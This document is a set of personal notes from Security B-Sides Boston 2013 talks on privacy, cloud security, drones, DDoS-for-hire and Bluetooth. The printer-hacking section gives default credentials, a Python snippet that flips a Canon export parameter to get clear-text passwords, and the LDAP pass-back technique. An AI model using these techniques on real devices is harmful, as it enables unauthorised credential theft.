Security B-Sides Boston - 5/18/2013

From srevilak.net
Revision as of 23:11, 15 February 2014 by SteveR

See http://bsidesboston.com/ and http://www.securitybsides.com for background on Security B-sides conferences.

Keynote: Privacy as Identity

Dr. Geer

The speaker works with a company called In-Q-Tel. In-Q-Tel is an investment firm whose funding comes by way of the US intelligence community. One of their portfolio companies was Keyhole, now Google Earth. They're headquartered in DC, with a local office in Waltham.

Technology changes very quickly. So quickly, that the implications of new technologies cannot be reflected in policy prior to adoption. Policy struggles to keep up. This isn't a bad thing. We live in a free society; you're allowed to do anything that isn't explicitly forbidden. The alternative is authoritarianism, where you're only allowed to do things that are explicitly permitted.

You don't need laws to prevent the impossible. But things that were impossible a few years ago are possible today. The rate of change isn't just about technology; it's about the implications of new technology.

There are around 25 congressional bills that deal with cybersecurity, most of which you wouldn't like.

We have so many laws that all enforcement is selective. See Harvey Silverglate's book Three Felonies a Day. Given our current laws, the average person commits three felonies a day, whether they realize it or not.

NSTIC: National Strategy for Trusted Identities in Cyberspace. The people who wrote it are concerned with attribution. They consider privacy a problem.

The internet was built on the end-to-end principle. The network is nothing more than a transmission mechanism; it doesn't enforce policy. All policy enforcement takes place at the endpoints.

When reading public policy documents, always start with the definitions. Most of the substance is in the definitions. The definitions will give you a good sense of what the rest of the policy is about.

At the moment, technology isn't out of our control. Someday, it could be.

Tomorrow night, 60 Minutes will air a segment on reidentification technologies. It's worth watching. If you're unique in any way, then you can probably be identified.

The world's corpus of data is doubling every 30 months. This rate of increase surpasses improvements in storage, and improvements in bandwidth.
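As a back-of-the-envelope sanity check on that rate (my arithmetic, not from the talk): doubling every 30 months works out to roughly 32% growth per year, or 16x per decade.

```python
# Corpus doubles every 30 months: size(t) = 2 ** (t / 30), with t in months.
annual_factor = 2 ** (12 / 30)    # growth over one year (12 months)
tenyear_factor = 2 ** (120 / 30)  # growth over a decade = 2 ** 4
print(round(annual_factor, 2), tenyear_factor)  # 1.32 16.0
```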

Punctuated Equilibrium: period of relative calm, punctuated by periods of rapid change.

Many of our security problems started when Microsoft included a free TCP/IP stack in Windows 3. They took an operating system that was designed for a single user, and exposed it to the rest of the world. On the internet, every sociopath is your next door neighbor.

In the last five years, vulnerability research has gone from being a hobby to a full time job. When it was a hobby, your "income" was recognition (for finding a new exploit), and new exploits were announced shortly after discovery. Today, exploit discovery is motivated by profit, and new exploits aren't announced as quickly. When you're paid to find exploits, you don't share.

Intrusion prevention is probably a lost cause. Intrusion toleration is a more tractable approach.

The US could corner the world market for cyber vulnerabilities if it wanted to. The cost to buy these things is barely a drop in the bucket. We should do this, and we should make all of the vulnerabilities public. This would empty everyone's warehouse of exploits. If we keep exploits secret, then other countries will too, and everyone will be sitting on their own little nuclear arsenal of zero-day vulnerabilities.

Many computer security laws only address what you've done; they completely ignore the issue of intent. That's a major departure from our legal tradition.

The practice of law is the search for analogy.

Denial of service attacks can be purchased rather cheaply.

Washington is relying on ISPs and other service providers to enforce their laws. They've deputized many of the companies, often against their will. Instead of deputies, service providers should be treated as common carriers.

Lately, there have been discussions about a potential back door in Skype. What motivation would Microsoft have for putting a back door in Skype? Some country probably insisted on it. That's the downside of doing business internationally: you have to conform to a lot of different laws.

Recording everything is cheaper than recording things selectively. To security professionals, "how long has this been going on?" is often more important than "who is doing this?".

According to the Cyber Security Confidence Index (?), risk tends to go up month over month, but the types of risk move around. The index is compiled from surveys of security professionals.

Most firms don't know what data they have. If you don't know what data you have, then how do you go about protecting it?

The average zero-day exploit is in use for 300 days before becoming public knowledge.

The ability to observe is increasing rapidly. We can do facial recognition at 500 meters and iris recognition at 50 meters. We also have the ability to identify people by reading their cell phone accelerometers (we all walk a little differently). Once you have observability, how far is the leap to identifiability?

The speaker prefers the following definition of security: security is the absence of unmitigated surprise. Along similar lines, privacy is where you've retained the capacity to misrepresent yourself.

All security technologies are dual use. Any technology can be used for offensive or defensive ends.

What will you own in five years? You can't will (for example) your iTunes collection to a friend, because you don't own it. Your entire iTunes collection is licensed. Who owns your face? If all of your mail is stored in GMail, then who owns that?

The most important things are usually uninteresting. The most interesting things are usually unimportant.

Cloudy Weather: How Secure is the Cloud?

Dan Stolts

The speaker's web site is http://itproguru.com. He also maintains http://bostonusergroups.org.

This talk will focus on Microsoft Azure, but many of the issues we'll discuss are common to all cloud providers.

Thinking about putting your data in the cloud? Here are some factors to consider:

  • Confidentiality. Who can see your data?
  • Integrity. Once you've stored data in the cloud, how can you be sure it isn't changed?
  • Availability
  • Risk management and compliance

Moving data to the cloud involves some customer accountability. For example, you'll want to choose a better password than "password".

In a multi-tenant system, who can read your data? At the cloud provider, who has access to your data? There's inherently some level of trust involved.

Google's cloud policy: Your data is our data.

Microsoft's cloud policy: Your data is your data.

Windows Azure complies with SSAE-16, EU-US Safe Harbor, ISO 27001:2005, and several other certification programs. See the Windows Azure Trust Center for more information about Microsoft's privacy, transparency, and compliance policies.

When you store data with a cloud provider, you need to understand their policies, and you need to decide whether (or how much) you trust them.

Security considerations:

  • Physical data center security and monitoring
  • Network. Firewall and packet filtering. Azure does automatic, on the fly network changes as new systems are spun up. This prevents tenants from accessing each other's network segments. Tenants should not be able to tweak network security settings.
  • Host. Azure dedicates specific cores to specific tenants. This prevents tenants from watching each other's CPU activity.
  • Applications. The issues of trust and policy apply when choosing applications, as much as they apply when choosing cloud providers.
  • Data and Database. Store keys and data in different places.

Is the cloud secure? Yes, if

  • You trust the cloud provider's certifications
  • You trust your users
  • You trust your cryptography implementations

Question: How do the security models differ between Amazon EC2 and Azure?

That's a long discussion, because there are a lot of differences.

Question: Does Azure's trust center allow you to store key encryption keys in an external service?

I think so, but I'll have to double-check.


Plunder, Pillage, and Print

Deral Heiland

This talk is about information discovery and extraction from embedded devices, such as printers, routers, switches, and power distribution units.

Embedded devices are plagued by security issues: default passwords are never changed, poor product design, lack of patch management.

What information can you obtain from embedded devices? The most useful things are: information about other network hosts, user credentials, and SNMP community strings.

See http://foofus.net

Pen Test Story #1. This story comes from a penetration testing engagement. We were trying to obtain Active Directory credentials from the client's network. The client was very proactive about security, and tried to follow best practices. Machines were all running current versions of Windows, security patches were up to date, and users didn't have administrative access on their local machines.

We found a couple of (Canon) printers that still had default passwords. These printers were configured to use the client's active directory server. The printers also had several address books. These address books contained domain usernames, and clear-text passwords.

Why does a printer need an LDAP addressbook? Good question.

Canon iR address books store passwords in clear text. Canon iR-ADV printers encrypt passwords during address book export, but there's a configuration option to turn the encryption off. You don't even need the configuration option: address book export is triggered by an HTTP POST to the printer's admin interface, and the POST contains a parameter called enc. Changing enc=2 to enc=0 gets you clear-text passwords.
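A minimal sketch of the trick: everything here except the enc parameter is invented for illustration (the real form fields and admin URL vary by printer model).

```python
import urllib.parse

def weaken_export_request(form_fields):
    """Given form fields captured from a legitimate address-book export
    POST, flip the encryption flag so the exported address book comes
    back with clear-text passwords (enc=2 encrypted, enc=0 not)."""
    fields = dict(form_fields)
    if fields.get("enc") == "2":
        fields["enc"] = "0"
    return fields

# Hypothetical captured request body; only "enc" is a real parameter name.
captured = {"page": "abook", "format": "ldif", "enc": "2"}
body = urllib.parse.urlencode(weaken_export_request(captured))
print(body)  # page=abook&format=ldif&enc=0
```

Replaying the modified body against the printer's export endpoint is then an ordinary POST.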

Lesson: if you have a multi-function printer, be sure to change the default password.

Pen Test Story #2. Our goal is to steal all of the client's Active Directory credentials, and use them to escalate our privileges.

Network file shares are a good place to collect information. Sometimes you'll find backup firewall configurations. Or, if you know the right community strings, you can extract configurations via SNMP.

APC devices can be a good way to obtain community strings. The default credentials are apc/apc, and many people forget to change them.

You should use different community strings for devices at different security levels. For example, your office firewall and your APC PDU sit at different security levels.

APC devices are in every data center. If you hack into one, you have the ability to power down hardware.

Over the last few years of doing security engagements, we've found that embedded device vulnerabilities have become more common.

Pen Test Story #3. Newer printers have the ability to do LDAP authentication. If you can get into one of these printers, set up an "evil" LDAP server, and tell the printer that "evil" is its LDAP directory. Some printers will send clear-text passwords to "evil". This is called a pass-back attack.

Sharp printers can be configured to use plaintext (LDAP) authentication. Unauthenticated users have the ability to make this change.
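Both attacks hinge on the fact that an LDAP simple bind carries the password as plain bytes on the wire, so anything that receives the bind (like a rogue server) gets the credential. A minimal sketch of the BER encoding of a simple-bind request, assuming short-form lengths (values under 128 bytes) throughout; the DN and password are made up:

```python
def build_simple_bind(msg_id, dn, password):
    """Encode a minimal LDAPv3 simple-bind request (BER, short-form
    lengths only). This is roughly what a printer sends to the LDAP
    server it's been pointed at."""
    def tlv(tag, value):
        assert len(value) < 128, "short-form lengths only"
        return bytes([tag, len(value)]) + value

    version = bytes([0x02, 0x01, 0x03])          # INTEGER 3 (LDAPv3)
    name = tlv(0x04, dn.encode())                # OCTET STRING: bind DN
    auth = tlv(0x80, password.encode())          # [0] simple authentication
    bind_req = tlv(0x60, version + name + auth)  # [APPLICATION 0] BindRequest
    message_id = bytes([0x02, 0x01, msg_id])
    return tlv(0x30, message_id + bind_req)      # outer LDAPMessage SEQUENCE

pkt = build_simple_bind(1, "cn=scanner,dc=example,dc=com", "s3cret")
print(b"s3cret" in pkt)  # True: the password travels in the clear
```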

Leasing companies are an attack vector. Companies that lease printers also service them. These companies tend to use the same passwords everywhere. If you know a password that works at one site, it will probably work at other sites.

At the very least, multi-function printers will give you a list of usernames. Once you have this list, start searching through file shares. You'd be surprised at how often you'll find a document with passwords.

Praeda. Praeda is an embedded device information harvesting tool. See http://github.com/percx/praeda.

Praeda has profiles for around 72 devices, and we'd welcome contributions of new device profiles.

Question: Have you ever tried to get information out of data stored on the printer (e.g., on the printer's hard drive)?

We haven't tried. But you can get some interesting things out of scanners. Lots of offices provide employees with cheap personal scanners, and employees sometimes leave sensitive documents on the scanner bed. If you can get into the scanner, you can get a copy of whatever's on the scanner bed.

Most printers take firmware upgrades via the raw print port (e.g., port 9100), and none of them verify the integrity of the upgrades. With some manufacturers, it's very easy to embed malware in a printer firmware upgrade, and the printer is happy to let you install it.

Every device that plugs into your network has a web interface. That should be your first attack vector.

Security Change Call for Volunteers

Oliver Day

Security Change is a non-profit that provides security consulting to agents of change. Who are agents of change? They're the people trying to make a difference in the world.

Our web site is http://securingchange.org.

Many non-profits don't have a security budget. They fall below the security poverty line.

Security change uses a "pay what you can" model. We're trying to lower the security poverty line. Many small non-profits have as many adversaries as large well-funded organizations.

We need volunteers in order to offer pro-bono security work. For example, to run automated vulnerability scans against the non-profit's web site, then sit down with the organization's director and explain the results. We need people to do this kind of work.

In the non-profit space, security issues often require creative solutions - not the typical things you'd do in a large corporation. For example, a robust backup strategy might be the most cost-effective countermeasure.

We also need incident response people (e.g., when an NGO's web site is hacked by an adversary). This is the most common security incident that we see.

We're planning to develop a backup service, inspired by the EFF's mirroring site. In version 1, we'll make a copy of your web site as static HTML pages. Version 2 will be a more thorough backup system.

We're also thinking about creating a security operations center, and offering forensic log analysis.

We started this organization in October 2012, and we have three clients so far. The mechanics of becoming a non-profit have taken a lot of time.

We have 14 volunteers. We're asking for minimum commitment of one hour per month.

We want to assign two volunteers per client, so they can cover for each other.

Question: Are there organizations that you won't work with?

Yes. Hate-based groups are out. Political groups are tricky. It depends on who volunteers do and do not want to work with.

If you'd like to volunteer, contact us at volunteer@securitychange.org.


Good Enough Isn't Anymore: the Value of Hitting Rock Bottom

Josh Corman

No one changes until the pain of maintaining inertia is greater than the pain of changing.

We spend a lot of money on signature-based anti-virus products, and those are becoming less and less effective.

State-sponsored espionage is a familiar reality to people in the security world.

We're getting better, but we're getting worse faster.

Burnout is becoming more and more common in the infosec world. The Maslach stress index measures fatigue, cynicism, and perceived self-efficacy. Infosec people are off the charts in the first two categories.

When protecting assets, it's important to consider replaceability (i.e., how easily can the asset be replaced). Credit cards are highly replaceable, yet we spend a ton of effort protecting them.

Our dependence on software and IT is growing faster than our ability to secure it. For example, the first SQL injection attacks appeared 14 years ago. SQL injection attacks are still a problem today.

A lot of embedded devices are directly connected to the internet, and completely unsecured.

Today, we have cars with vulnerable, unpatchable, operating systems.

Try this exercise for 24 hours: when talking, replace the word "software" with "vulnerability", and replace "connected" with "exposed".

Vendors don't need to be ahead of security threats. They just need to be ahead of the buyers.

HD Moore's law: the power of a script kiddie doubles every day.

When doing vulnerability assessments, the adversary makes all the difference.


The Future of Drones and the Impact on Infosec

Andrew Clare

We tend to think of drones as being for military use. In the next few years, expect to see more non-military uses. For example, searching for lost people (search and rescue), crop dusting, tracking weather, finding poachers, cleanup of nuclear disasters, journalism, and wildlife studies.

halab.mit.edu: MIT's Humans and Automation Lab.

Some research focuses on making it easier for humans to control unmanned vehicles. We're enhancing vehicle autonomy, but we're also increasing vulnerability.

There's research in operating UAVs in GPS-denied environments. For example, drones that can fly inside underground parking garages. The drone has to learn its way around. There's also research in miniaturization: flying drones that are the size of a quarter.

An expected timeline for non-military UAV deployment:

  • Within 5 years: agriculture, low altitude photography
  • 5-7 years: Self-driving cars and passenger trains.
  • 10+ years: cargo delivery
  • 20+ years: unmanned commercial flights, personal flying cars.

Certification is a challenge. How do you certify complex automation systems? Who's ultimately responsible for what UAVs do? The operator? The computer? The company that developed the UAV? The engineer(s) that wrote the UAV software?

Infosec issues affecting UAVs:

  • GPS spoofing
  • Hacking control links
  • Supply chain security (who made the parts that were used to build the UAV?)
  • Interaction between unmanned vehicles
  • Relying on automation systems before we have the ability to secure them

Question: Are there precedents for UAV technology systems?

Fly-by-wire might be a predecessor, but it's not quite the same. Fly-by-wire operates on a closed system. UAVs are exposed on standard networks.

Question: What about regulation?

The FAA is required to attempt to integrate UAV regulation by 2014. Some local communities are passing their own laws. As the technology becomes more popular, anti-UAV measures will probably become more widespread.

Question: What about other governments?

Many other countries are ahead of us in UAV implementation. For example, Canada, Japan, Russia, India, and the United Kingdom.

Comment: Cost savings was a huge motivation for the military use of UAVs. Keeping people out of risky situations was another motivation.

UAVs can be used to analyze networks. For example, by reading electromagnetic energy emissions from wires. There's a conflict of interest in UAV security. Security costs money, which goes against the goal of making low-cost UAVs.

Question: Why has there been more adoption outside the US than inside the US?

Regulatory factors are the biggest reason. We also have a more complex airspace inside the United States. Our military has done more work than other countries, but the military can control the airspace.

Comment: NHTSA has asked for money to research vulnerabilities in automotive computers. A lot of technology is feature-driven, without being secure.

Three states allow autonomous vehicle testing. Some people jam the GPS systems in their cars. This would be a major problem for precision GPS systems in self-driving vehicles.


The State of Privacy and Proper Planning for the Future

Jeff Northrop

In 1890, Louis Brandeis (later a Supreme Court justice) published one of the first articles about the loss of privacy to technology. Cameras were the technology in question. Similar arguments were made with the advent of audio and video recording.

In 1967, Alan Westin wrote about the risks of privacy loss due to computers. He saw loss of privacy coming from data correlation. He also helped push forward the Privacy Act of 1974. In 1974, the main fear involved what the government would do with your personal data.

In 1998, we saw passage of the EU Data Directive. It's a set of suggested regulations that gives citizens a lot of control over their own data.

Forrester Research produces a heat map of privacy laws. Europe is hot. The US is cold, on par with Russia, and only slightly warmer than China.

Today, we have a menagerie of privacy laws, at both the federal and state level. There are around 25 congressional bills dealing with the internet; nearly all of them have some privacy component.

Question: How difficult is compliance with EU regulations?

It's an entirely different creature. The EU Data Directive was a framework, rather than a set of regulations.

Security and privacy are not the same as compliance. For example, there's a social mobile app called Path. Path was mining data from mobile phone address books. The FTC issued a judgment against them, and Path has to undergo 20 years of regular privacy audits. Google Street View was fined $7 million, and required to do public education on security and privacy. Neither Path nor Google overtly broke any law, but they violated general expectations of privacy.

We've had advances in data analytics, and consumers feel they are losing control of their personal information. This is a source of tension, and there's no solution yet.

We share personal information in a lot of ways: phones, shopping cards, EZ passes. The primary uses of data are okay. Secondary and tertiary uses are the problem.

Comment: I think people are not paying attention to what they're doing, in terms of EULAs, etc.

Facebook actually gives you a fair amount of control, but not everyone takes advantage of those controls.

Question: How many people here read privacy policies?

Around 5 of 25 people raise their hands.

Comment: A key challenge with privacy policies is keeping track of third parties that you've shared data with, and being able to retract data from those third parties.

NIST 800-53 covers information security and privacy controls for government agencies. That might be relevant here.

On one hand, consumers fear the proliferation of their PI. On the other hand, technology makes it easier to store data, and to do analytics. PII is the fuel that makes analytics run. Reducing fear and allowing innovation to move forward is a major challenge.

To get privacy right, we need transparency and accountability.

What does a privacy program entail? Typically a Chief Privacy Officer, a team, and a vision. Internal privacy teams are focused on risk management, which is a form of security management. Set your metrics, and measure how well you're doing.

Cyber insurance is useful. It can help you cover the cost of a data breach. You should have plans for resolving data and privacy breaches.

Question: Is the advancement of privacy complicated by customer misconceptions?

Meaningful transparency is the hardest part, and the most important part.


The Noob Persistent Threat

Allison Nixon and Brandon Levene

Some people just need a high-five. In the face. With a chair.

What is the Noob persistent threat? It's usually script kiddies. They're 14-18 years old, and the bottom feeders in the criminal landscape. They generally have a low level of technology skills.

There are web sites that sell DDoS services. Others will sell credentials, or root kits. Many of these are just scams.

Carder shops are marketplaces for buying credit card numbers. Type "Credit Card CCV" into your favorite search engine, and see what comes up.

Booter shells are DDoS-for-hire sites. They're often used to target gaming web sites, or whatever your average 15-year-old wants to get back at. Some booter shells use IaaS servers to amplify DDoS attacks. Oddly, nearly all booter shell sites accept payment via PayPal. 70% of booter shells run on CloudFlare.

It's not unusual for noobs to use booter shell sites to attack other booter shell sites. Question: can booter shells be used to attack smartphones?

Theoretically, yes. Practically, no.

See http://bit.ly/12iqEn1 for source code to one booter shell site.


Blucat: Netcat for Bluetooth

Joseph Cohen

The Blucat project was inspired by netcat.

Bluetooth URLs contain a protocol, a bluetooth address (which looks like a MAC address), and a channel number.

rfcomm is the most common protocol. btspp, the Bluetooth serial port profile, is also common.
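The URL structure above can be sketched with a small parser (the address and channel below are invented, and optional ;key=value parameters such as ;authenticate=false are ignored for simplicity):

```python
import re

def parse_bt_url(url):
    """Split a Bluetooth service URL into (protocol, address, channel).
    Example form: btspp://0014A78A3022:3"""
    m = re.match(r"(\w+)://([0-9A-Fa-f]{12}):(\d+)", url)
    if not m:
        raise ValueError(f"not a Bluetooth service URL: {url!r}")
    return m.group(1), m.group(2), int(m.group(3))

print(parse_bt_url("btspp://0014A78A3022:3"))
# ('btspp', '0014A78A3022', 3)
```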

When probing, the first step is network discovery: what devices are in range, and what services are they advertising?

Once you discover a bluetooth address, you can scan the device's list of channels (there are around 30 of them). The device might offer services that it's not advertising.

We've found that some mobile phones accept AT commands over bluetooth.

Blucat is Java-based. It uses a popular Bluetooth stack, and it's compatible with many devices.

Linux has a bluetooth stack called BlueZ.

Once you've paired an Android phone, it's very easy to get a root shell over bluetooth. The lesson here: be very careful about what you pair with.

In cars, bluetooth connections are usually protected by trivial passwords, like "1111".